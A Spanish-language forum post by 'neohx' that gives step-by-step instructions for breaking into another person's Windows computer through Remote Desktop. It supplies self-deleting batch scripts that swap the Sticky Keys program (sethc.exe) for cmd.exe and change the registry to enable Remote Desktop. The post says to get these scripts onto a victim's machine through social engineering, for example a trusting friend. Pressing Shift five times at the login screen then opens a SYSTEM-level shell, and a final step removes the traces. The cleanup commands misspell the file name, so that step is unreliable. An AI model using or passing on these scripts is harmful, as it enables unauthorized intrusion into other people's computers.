[Manual] - Hackear por Escritorio Remoto de Windows (Por Puerto 3389)

Hackear por Escritorio Remoto de Windows

1)Escanear los puertos, para ver si tiene el puerto 3389 (El de escritorio
remoto)abierto, si es que tiene el puerto habilitado seguir el paso 2), si es que el puerto y Escritorio Remoto no esta funcionando el pasar al paso 2.1):

2)Crear un batch que haga los siguiente:

Insertar CODE, HTML o PHP:

echo off
title .
Copy "c:\windows\system32\sethc.exe" "c:\windows\system32\sethc.zzz"
Copy "c:\windows\system32\cmd.exe" "c:\windows\system32\sethc.exe"
del %0
exit

Este batch lo que hace es crearnos un agujero para poder pasar. Setch es el programita que inicia cuando presionamos 5 veses Shift. Tambien es posible utilizar Sethc.exe en el escritorio Remoto de Windows.
Luego de alguna forma mandamos el batch a nuestra victima y cuando lo abra nos abrira el paso
y el batch se autoborrara.

2.1)Si es que no tiene habilitado el "Escritorio Remoto de Windows" creamos
el siguiente Batch para activarlo y crear el agujero que nos dejara pasar.

Insertar CODE, HTML o PHP:

echo off
title .
cls
Copy "c:\windows\system32\sethc.exe" "c:\windows\system32\sethc.zzz"
Copy "c:\windows\system32\cmd.exe" "c:\windows\system32\sethc.exe"
reg delete "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnect ions /f
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnect ions /t "REG_DWORD" /d 0
del %0
exit

Y esto se lo enviamos ha la victima de alguna forma y al momento de abrirlo nos habilitara el
"Escritorio Remoto de Windows" y nos abrira el paso y el Batch se AutoBorrara.

3)Luego abrimos Inicio/programas/Accesorios/comunicaciones/ConeXion a escritorio remoto
Presionamos opciones, y rellenamos los datos de la pestaña General de la siguiente forma:
Equipo:1.2.3.4 <- Direcciona IP de la victima
Nombre de Usuario: <-No ponemos nada lo dejamos Vacio
Contraseña: <-Lo dejamos vacio.
Dominio: <-Lo dejamos vacio.

Luego nos pasamos a la pestaña "Recursos locales"
y cambiamos solo la opcion "Teclado", desplegamos la lista y seleccionamos "En el equipo remoto"

4)Luego click en conectar.

5)Cuando nos salga la ventanita pidiendo USER/PASS presionamos 5 veses SHIFT y nos saldra la ventanita de DOS en el equipo remoto y STICKYKEYS en nuestra maquina, el STICKYKEYS de nuestra maquina lo cerramos para que no nos moleste.

6)Ahora tenemos acceso a la raiz osea como SYSTEM (NT AUTHORITY\SYSTEM) teniendo es DOS en la mano, podemos iniciar algunos servicios como ser el telnet, o podemos modificar algunas cosas de su PC. (Esto si quieren, inicien: Compmgmt.msc).

7)Para finalizar debemos borrar el programa que nos dejo pasar, Recuerdan que hize una copia de Sethc.exe a Sethc.zzz ahora tenemos que volver las cosas como estaban.

Insertar CODE, HTML o PHP:

copy "c:\windows\system32\setch.zzz" "c:\windows\system32\setch.exe"
del "c:\windows\system32\setch.zzz"

Microsoft creo "Escritorio Remoto de Windows" para que lo Explotemos
y lo usemos cuando no tengamos un troyano ha mano. (Claro que tambien es una herramienta util..)

EXPLICACION DEL MANUAL.
Cuando enciendes un ordenador, normalmente pide un user y un pass, se podría cambiando los valores de CMD por StickyKeys, cuando estas para meter la pass, pulsas 5 veces shift, y se abriría CMD, ya desde ahí podrías ejecutar servicios, etc...
Con ingenieria social intentariamos colar los .bat
Por ejemplo, quieres entrar al de tu amigo (uno que se confie), le pasas los bats, te haces con su ip, y lo intentas jeje



Saludoss!!
AGRADESCAN y acepto chuchadas.

by neohx.

 

jaja sipo si mi hermano ql se hace llamar comrade pero yo saq el mio de matrix jajaj
no cachaste mi firma con neo y kevin mitnick a un lado¿?